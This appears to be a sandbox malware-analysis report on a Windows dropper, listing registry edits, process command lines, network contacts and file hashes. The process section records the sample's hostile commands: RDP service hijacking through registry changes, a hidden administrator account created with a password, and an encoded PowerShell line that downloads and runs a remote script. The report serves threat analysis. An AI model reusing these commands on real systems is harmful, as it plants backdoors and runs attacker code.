| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1aa9dda1b9b413444b0668500611c7f3.exe
"C:\Users\Admin\AppData\Local\Temp\1aa9dda1b9b413444b0668500611c7f3.exe"
C:\Windows\SysWOW64\dllhost.exe
"C:\Windows\System32\dllhost.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Bianchezza.xltx
C:\Windows\SysWOW64\cmd.exe
cmd
C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^neXfkAonzMgXVmZcOdbhYtXinpUsiRQPwpGkvuIPGbsmTRiWdNhKCZQztQQwGRdBWnVLTOZIHIGBMnhHwYqzEyjezjuGfHoPuPCcVveCOErUagHFCoZIRXXQkTsHHzzqmRcWVSM$" Veda.xltx
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com
Uso.exe.com B
C:\Windows\SysWOW64\PING.EXE
ping GFBFPSXA -n 30
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com B
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1f1xzxvc\1f1xzxvc.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF3D7.tmp" "c:\Users\Admin\AppData\Local\Temp\1f1xzxvc\CSCC01F7819505B4CD38E2EBF3B2323F1.TMP"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
C:\Windows\system32\net.exe
net start rdpdr
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
C:\Windows\system32\cmd.exe
cmd /c net start TermService
C:\Windows\system32\net.exe
net start TermService
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Ghar4f5 /del
C:\Windows\system32\net.exe
net.exe user wgautilacc Ghar4f5 /del
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc n6UvtOVP /add
C:\Windows\system32\net.exe
net.exe user wgautilacc n6UvtOVP /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc n6UvtOVP /add
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" wgautilacc /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc n6UvtOVP
C:\Windows\system32\net.exe
net.exe user wgautilacc n6UvtOVP
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc n6UvtOVP
C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | SMlwtcVckecAT.SMlwtcVckecAT | udp |
| N/A | 8.8.8.8:53 | 2no.co | udp |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
| N/A | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| N/A | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| N/A | 8.8.8.8:53 | www.speedtest.net | udp |
| N/A | 151.101.2.219:80 | www.speedtest.net | tcp |
| N/A | 151.101.2.219:443 | www.speedtest.net | tcp |
| N/A | 151.101.2.219:80 | www.speedtest.net | tcp |
| N/A | 8.8.8.8:53 | c.speedtest.net | udp |
| N/A | 151.101.2.219:443 | c.speedtest.net | tcp |
| N/A | 8.8.8.8:53 | speedtest.zeelandnet.nl | udp |
| N/A | 212.115.192.180:8080 | speedtest.zeelandnet.nl | tcp |
| N/A | 8.8.8.8:53 | speedtest.worldstream.nl | udp |
| N/A | 185.182.195.78:8080 | speedtest.worldstream.nl | tcp |
| N/A | 8.8.8.8:53 | speedtest.caiw.net | udp |
| N/A | 62.45.44.26:8080 | speedtest.caiw.net | tcp |
| N/A | 8.8.8.8:53 | speedtest.hostsailor.com | udp |
| N/A | 185.117.72.144:8080 | speedtest.hostsailor.com | tcp |
| N/A | 8.8.8.8:53 | asfuuvhv3083f.xyz | udp |
Files
memory/1088-114-0x0000000000000000-mapping.dmp
memory/504-115-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Bianchezza.xltx
| MD5 | 7d4057365f857501253e0273336b7256 |
| SHA1 | 62375a5303e4a59e95cf7e0072cd58efa187b7f2 |
| SHA256 | 003e6c8d0f15c6eb4738ea99f9fd99457d43d65e9d4f15506446db4b51b02079 |
| SHA512 | 7059a22ba6020db18f7b86e09b816bedd0a9f208818dcb98c69a647f6aee18ffaf4c60c3725bdfa8a354a7244b9c32fc07c3fc0d807ca39dda69842681a9fd6c |
memory/3168-117-0x0000000000000000-mapping.dmp
memory/2080-118-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Veda.xltx
| MD5 | e7173515ef44feb1ee618484b7743e93 |
| SHA1 | 8f976bf1da030655afd0f43e0a357a58a2ea9178 |
| SHA256 | 7875f52e1f97a463783456b6b3c2dbc85f183534b5281ba72b0574529139d86b |
| SHA512 | 41830f7036e32679bf274c67390dd6bca9f6286ee8d3144d0e57ca39fdca1ec1a8273fb528ffed819444b183067ab6078bfaa0e82d16deed3fac47a1cf027361 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Quegli.xltx
| MD5 | 88f64f83b0347a89de94d39c922de8be |
| SHA1 | 6f6994a18df262aad0d2b50b7e8b27b6b310b7a4 |
| SHA256 | 2f642e4a8b22ad149697df770a1f5d1d87aec3d8b2320b867597ebfd5e3d8fd5 |
| SHA512 | 9450effe8020f6a8adc840566639f2e5f6942217ae56182af7af5de441bc7ed37b97da983281e7d8b17ab9f6334c79269c94588f14ff61010d1b1c2b27c754a8 |
memory/2076-121-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com
| MD5 | f83ab141e29899ceb5308dabde894a0e |
| SHA1 | 6ea46bb7102125fa5d39b77547dab28ec346e9f9 |
| SHA256 | ce2fb05b7d6e31db76127521aac02d9b3d595058ba13687c4ad6c68088eb8d99 |
| SHA512 | d79ccd447e15899efbc68e351d2500efc8ad6c106eb76565105e5eec3ace6a02435d6569d23efc65527d00c878eb22f4afabfdca440d9b573548e18fdea72847 |
memory/2188-123-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\B
| MD5 | 88f64f83b0347a89de94d39c922de8be |
| SHA1 | 6f6994a18df262aad0d2b50b7e8b27b6b310b7a4 |
| SHA256 | 2f642e4a8b22ad149697df770a1f5d1d87aec3d8b2320b867597ebfd5e3d8fd5 |
| SHA512 | 9450effe8020f6a8adc840566639f2e5f6942217ae56182af7af5de441bc7ed37b97da983281e7d8b17ab9f6334c79269c94588f14ff61010d1b1c2b27c754a8 |
memory/3940-125-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com
| MD5 | f83ab141e29899ceb5308dabde894a0e |
| SHA1 | 6ea46bb7102125fa5d39b77547dab28ec346e9f9 |
| SHA256 | ce2fb05b7d6e31db76127521aac02d9b3d595058ba13687c4ad6c68088eb8d99 |
| SHA512 | d79ccd447e15899efbc68e351d2500efc8ad6c106eb76565105e5eec3ace6a02435d6569d23efc65527d00c878eb22f4afabfdca440d9b573548e18fdea72847 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sta.xltx
| MD5 | 109dfda879c2954ab2c86c465af694b1 |
| SHA1 | 318bec946966f6640d4a8cc2f615d8ff46e0e598 |
| SHA256 | 74a6499a65d4b1df96a8db88714fb75f6ffe99b84d39c4d492ec840df0f9bf67 |
| SHA512 | afb8077b538ce66fe6c998e10699369f7151ba35e78e08c5cc82d78f48c0662bf729f2a0dd666dc755841a939c1212ddc55132ab4ae441f341dfa01122bfe977 |
memory/3940-128-0x000001D1714D0000-0x000001D1714D1000-memory.dmp
memory/1840-129-0x0000023A00000000-0x0000023A0064A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com
| MD5 | f83ab141e29899ceb5308dabde894a0e |
| SHA1 | 6ea46bb7102125fa5d39b77547dab28ec346e9f9 |
| SHA256 | ce2fb05b7d6e31db76127521aac02d9b3d595058ba13687c4ad6c68088eb8d99 |
| SHA512 | d79ccd447e15899efbc68e351d2500efc8ad6c106eb76565105e5eec3ace6a02435d6569d23efc65527d00c878eb22f4afabfdca440d9b573548e18fdea72847 |
memory/1840-131-0x0000023A00000000-0x0000023A0064A000-memory.dmp
memory/1840-132-0x0000023A40220000-0x0000023A40640000-memory.dmp
memory/1840-135-0x0000023A25DD3000-0x0000023A25DD5000-memory.dmp
memory/1840-134-0x0000023A25DD0000-0x0000023A25DD2000-memory.dmp
memory/1840-136-0x0000023A25DD5000-0x0000023A25DD6000-memory.dmp
memory/1840-137-0x0000023A25DD6000-0x0000023A25DD7000-memory.dmp
memory/2068-138-0x0000000000000000-mapping.dmp
memory/2068-143-0x0000021A24CC0000-0x0000021A24CC1000-memory.dmp
memory/2068-146-0x0000021A250E0000-0x0000021A250E1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ready.ps1
| MD5 | 3447df88de7128bdc34942334b2fab98 |
| SHA1 | 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb |
| SHA256 | 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9 |
| SHA512 | 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f |
memory/2068-148-0x0000021A24CF0000-0x0000021A24CF2000-memory.dmp
memory/2068-149-0x0000021A24CF3000-0x0000021A24CF5000-memory.dmp
memory/3976-155-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\1f1xzxvc\1f1xzxvc.cmdline
| MD5 | fddc192a7202700523abca2181e381ff |
| SHA1 | 2e9dc45d95b1709d9c916659707080038ff30bb2 |
| SHA256 | 2ba72332376b66c49b7ed12ad090e2814c5cb5a0282a870a7d5f8fe29c4be944 |
| SHA512 | 04a6a5de331430f6e5e93a93df3e983d11ae08387888dd3fd318f163a7361f5fcec3ae3f26fc3dbd1275765950182801c7566736497f50f0395b0407eb53f22d |
memory/2068-157-0x0000021A24CF6000-0x0000021A24CF8000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\1f1xzxvc\1f1xzxvc.0.cs
| MD5 | 4864fc038c0b4d61f508d402317c6e9a |
| SHA1 | 72171db3eea76ecff3f7f173b0de0d277b0fede7 |
| SHA256 | 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84 |
| SHA512 | 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31 |
memory/2132-159-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\1f1xzxvc\CSCC01F7819505B4CD38E2EBF3B2323F1.TMP
| MD5 | b9d40d12f521cfe49ac35b6048ced8f1 |
| SHA1 | 0c55968f67fb0773d4871de7182ce1f621527da4 |
| SHA256 | 4be8c5939401129c5c04c7c5f20dbca2ad7368cb7411698a8c70dbd2a6e7246a |
| SHA512 | ce3bf88cb518ef911d015c739dab25b8e761c833b0dc57f392f69f1de701eb139eabbb2b294be9efa15f2331361ef409456101f7b5004bd4324993865d6d5f70 |
C:\Users\Admin\AppData\Local\Temp\RESF3D7.tmp
| MD5 | 95564bb3195d0e6212166252031905c6 |
| SHA1 | 0ec9abf3449221a6bba295e592d91e18ca8c6e98 |
| SHA256 | 5571e382fbdafd85dba0dae53b5edd5e1f005c0e452b5df35eeccc37f1caf1e8 |
| SHA512 | 27efdd8e8e0aade58deb6bf4fd6e0fc1d2907bd1019ecd89648380fde69d4211b5213dca548cbe8800e2d1f5fdb62a364e7311a0f8393cb22663ebe3af92991b |
C:\Users\Admin\AppData\Local\Temp\1f1xzxvc\1f1xzxvc.dll
| MD5 | 2dfbc484274d246b95685b39d1d85a73 |
| SHA1 | f390d8273f8eeb7d04e521a1c293b503998536ce |
| SHA256 | 414434de279b95d644edb71c54f613b77792cb9dd4122007ddd2e8b5cdd17be1 |
| SHA512 | 98f33852a64beac4ecae6e2cf08d38dff3cea5c7cdc0f378f9a399ca2d6b645b8d82c46c088a85ad91b886436b88657255320ee2a41df0879f099d9356ffe457 |
memory/2068-163-0x0000021A24E30000-0x0000021A24E31000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1
| MD5 | 91f2ffa1c3ed8abba9ce6a3a8f63ae61 |
| SHA1 | 0686c03aedfa4a0a17397da8dbb7e73cea42fa33 |
| SHA256 | 069a95878671a32398ba592ad95049a9bff8b727849465d73c17382eb53869f8 |
| SHA512 | 91473dfbf6b058b9ff70b38b1a7c82046b130c44e349e90b97eb651198b0a64a201ea64b03877e3179b2cb8c729a9fb0a54c408206d8f06c8a71197d3fba93ae |
memory/2068-169-0x0000021A24CF8000-0x0000021A24CF9000-memory.dmp
memory/2068-170-0x0000021A262D0000-0x0000021A262D1000-memory.dmp
memory/2068-171-0x0000021A26660000-0x0000021A26661000-memory.dmp
memory/3236-179-0x0000000000000000-mapping.dmp
memory/3236-189-0x000002A45EFC3000-0x000002A45EFC5000-memory.dmp
memory/3236-188-0x000002A45EFC0000-0x000002A45EFC2000-memory.dmp
memory/3236-208-0x000002A45EFC6000-0x000002A45EFC8000-memory.dmp
